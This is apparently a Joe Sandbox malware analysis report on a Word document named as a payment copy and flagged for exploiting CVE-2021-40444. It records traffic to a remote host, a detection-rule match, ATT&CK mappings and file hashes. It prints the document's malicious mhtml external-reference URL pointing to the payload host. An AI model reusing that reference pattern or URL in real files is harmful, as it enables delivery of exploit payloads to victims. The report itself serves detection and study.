Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pzsrblog.comIf-Modified-Since: Tue, 20 Dec 2022 05:25:57 GMTConnection: Keep-Alive
Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: unknownHTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknownHTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.22:49177 version: TLS 1.0
Source: unknownHTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.22:49182 version: TLS 1.0
Source: unknownNetwork traffic detected: HTTP traffic on port 49184 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49185 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49183 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49182 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49185
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49184
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49183
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49182
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180
Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Dec 2022 13:08:02 GMTContent-Type: text/html; charset=utf-8Content-Length: 19268Connection: closeServer: LiteSpeedlast-modified: Tue, 25 Jan 2022 07:44:20 GMTetag: "4b44-61efaa54-78a64b804597b561;;;"accept-ranges: bytesx-turbo-charged-by: LiteSpeed
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Dec 2022 13:08:11 GMTContent-Type: text/html; charset=utf-8Content-Length: 19268Connection: closeServer: LiteSpeedlast-modified: Tue, 25 Jan 2022 07:44:20 GMTetag: "4b44-61efaa54-78a64b804597b561;;;"accept-ranges: bytesx-turbo-charged-by: LiteSpeed
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Dec 2022 13:08:16 GMTContent-Type: text/html; charset=utf-8Content-Length: 19268Connection: closeServer: LiteSpeedlast-modified: Tue, 25 Jan 2022 07:44:20 GMTetag: "4b44-61efaa54-78a64b804597b561;;;"accept-ranges: bytesx-turbo-charged-by: LiteSpeed
Source: ~WRS{2DAED936-6AE5-4EA6-A2A6-98457564935D}.tmp.0.drString found in binary or memory: https://pzsrblog.com/wp-content/uploads/2012/PROMZwFp385vXr
Source: ~WRF{351482B1-26A6-4A40-B9B2-E50157B39785}.tmp.0.drString found in binary or memory: https://pzsrblog.com/wp-content/uploads/2012/PROMZwFp385vXrA
Source: ~WRF{351482B1-26A6-4A40-B9B2-E50157B39785}.tmp.0.drString found in binary or memory: https://pzsrblog.com/wp-content/uploads/2012/PROMZwFp385vXrAx-usc:https://pzsrblog.com/wp-content/up
Source: ~WRF{351482B1-26A6-4A40-B9B2-E50157B39785}.tmp.0.drString found in binary or memory: https://pzsrblog.com/wp-content/uploads/2012/PROMZwFp385vXryX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D442B920-91E2-4DCA-989E-AADAC9D5BA07}.tmpJump to behavior
Source: unknownDNS traffic detected: queries for: pzsrblog.com
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: pzsrblog.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: pzsrblog.comIf-Modified-Since: Tue, 20 Dec 2022 05:25:57 GMTConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pzsrblog.comIf-Modified-Since: Tue, 20 Dec 2022 05:25:57 GMTConnection: Keep-Alive
Source: unknownHTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.22:49175 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.22:49179 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.22:49183 version: TLS 1.2
Source: document.xml.rels, type: SAMPLEMatched rule: EXPL_CVE_2021_40444_Document_Rels_XML date = 2021-09-10, author = Jeremy Brown / @alteredbytes, description = Detects indicators found in weaponized documents that exploit CVE-2021-40444, reference = https://twitter.com/AlteredBytes/status/1435811407249952772
Source: ~WRF{351482B1-26A6-4A40-B9B2-E50157B39785}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: Payment copy_2911022.docx.docReversingLabs: Detection: 41%
Source: Payment copy_2911022.docx.docVirustotal: Detection: 46%
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: Payment copy_2911022.docx.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Payment copy_2911022.docx.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$yment copy_2911022.docx.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR5BC5.tmpJump to behavior
Source: classification engineClassification label: mal68.expl.evad.winDOC@1/20@7/1
Source: ~WRF{351482B1-26A6-4A40-B9B2-E50157B39785}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{351482B1-26A6-4A40-B9B2-E50157B39785}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{351482B1-26A6-4A40-B9B2-E50157B39785}.tmp.0.drOLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Payment copy_2911022.docx.docInitial sample: OLE zip file path = word/media/image1.jpg
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: ~WRF{351482B1-26A6-4A40-B9B2-E50157B39785}.tmp.0.drInitial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

barindex
Contains an external reference to another file
Source: document.xml.relsExtracted files from sample: mhtml:https://pzsrblog.com/wp-content/uploads/2012/promzwfp385vxr!x-usc:https://pzsrblog.com/wp-content/uploads/2012/promzwfp385vxr
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts13
Exploitation for Client Execution		Path InterceptionPath Interception1
Masquerading		OS Credential Dumping1
File and Directory Discovery		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory2
System Information Discovery		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
Non-Application Layer Protocol		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration14
Application Layer Protocol		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer4
Ingress Tool Transfer		SIM Card SwapCarrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Payment copy_2911022.docx.doc41%ReversingLabsDocument-Office.Exploit.CVE-2021-40444
Payment copy_2911022.docx.doc46%VirustotalBrowse
Payment copy_2911022.docx.doc100%AviraEXP/CVE-2021-40444.Gen

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://pzsrblog.com/wp-content/uploads/2012/PROMZwFp385vXrA0%Avira URL Cloudsafe
https://pzsrblog.com/wp-content/uploads/2012/PROMZwFp385vXrAx-usc:https://pzsrblog.com/wp-content/up0%Avira URL Cloudsafe
https://pzsrblog.com/wp-content/uploads/2012/PROMZwFp385vXr0%Avira URL Cloudsafe
https://pzsrblog.com/wp-content/uploads/2012/PROMZwFp385vXryX0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
pzsrblog.com
118.27.125.229
truetrue
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://pzsrblog.com/wp-content/uploads/2012/PROMZwFp385vXrfalse
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://pzsrblog.com/wp-content/uploads/2012/PROMZwFp385vXrA~WRF{351482B1-26A6-4A40-B9B2-E50157B39785}.tmp.0.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://pzsrblog.com/wp-content/uploads/2012/PROMZwFp385vXrAx-usc:https://pzsrblog.com/wp-content/up~WRF{351482B1-26A6-4A40-B9B2-E50157B39785}.tmp.0.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://pzsrblog.com/wp-content/uploads/2012/PROMZwFp385vXryX~WRF{351482B1-26A6-4A40-B9B2-E50157B39785}.tmp.0.drfalse
    • Avira URL Cloud: safe
    		unknown

    World Map of Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public IPs

    IPDomainCountryFlagASNASN NameMalicious
    118.27.125.229
    		pzsrblog.comJapan7506INTERQGMOInternetIncJPtrue

    General Information

    Joe Sandbox Version:36.0.0 Rainbow Opal
    Analysis ID:770660
    Start date and time:2022-12-20 14:07:07 +01:00
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 5m 21s
    Hypervisor based Inspection enabled:false
    Report type:light
    Sample file name:Payment copy_2911022.docx.doc
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:6
    Number of new started drivers analysed:1
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal68.expl.evad.winDOC@1/20@7/1
    EGA Information:Failed
    HDC Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Found application associated with file extension: .doc
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer

    Warnings

    • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
    • TCP Packets have been reduced to 100
    • Report size getting too big, too many NtOpenFile calls found.
    • Report size getting too big, too many NtQueryAttributesFile calls found.

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    No context

    Domains

    No context

    ASNs

    No context

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):131072
    Entropy (8bit):0.2880914581185761
    Encrypted:false
    SSDEEP:48:I3rTGRB0Di+ZizW+BY4dCh0ERieLrEorjO56VcH:K+Li58zWaY6iYA86VcH
    MD5:B53533125231DD0B586CB6715AE19CB6
    SHA1:A9E7566E4BB7CA451B8D9E3559C7F63607A4BD3E
    SHA-256:4BC81648A241EC2BC277A80D232691CD168B4DCC768B323D509ECD740BE75CF0
    SHA-512:D2F54F0347C2C9BD1268F7958DC3B3B76A8C962D6FC425E3C33D32F9DB142B266DADEB462189677E0CABFB024AAF94F186CC958C3A27D01545E6FA1EF11C8FD1
    Malicious:false
    Reputation:low
    Preview:......M.eFy...z2&&..L.I..)...S,...X.F...Fa.q............................_...)..H..:Q.P..........'d.....F.?I.O.P..A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{9D741663-0E54-4731-8095-222DB92ACF56}.FSD

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):131072
    Entropy (8bit):0.6693472333421685
    Encrypted:false
    SSDEEP:96:K3G8RCyr8OairdIwgNOoGzn/iNFD3depKCHf6XZoZGPY/MkfO:jYdmBGT/wFD3depKCHf6XZoZeMMkfO
    MD5:5FC240531A725DDD31B36CFC13E5A401
    SHA1:AAA4F0EE3AB6F3A36E5D00218E8CA4167B7DE64C
    SHA-256:2AC86D569E45C0C59AC8046F7CC2BF0A149F46ED0B92CE93E7FAE2328FD3575A
